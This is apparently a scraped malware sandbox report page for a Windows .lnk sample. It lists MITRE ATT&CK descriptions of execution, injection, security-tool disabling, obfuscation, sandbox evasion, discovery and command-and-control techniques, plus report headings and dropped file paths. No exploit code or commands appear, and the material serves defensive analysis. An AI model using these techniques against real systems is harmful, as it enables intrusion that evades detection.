Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0A3NB8ot11.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3F5329D9-715F-43E7-9B0A-DDA2EB55955F}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{823ECC80-3924-4C1E-B4E6-697830F5CAB5}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.0.cs

C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline

C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.dll

C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.out

Windows Analysis Report
0A3NB8ot11.lnk

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre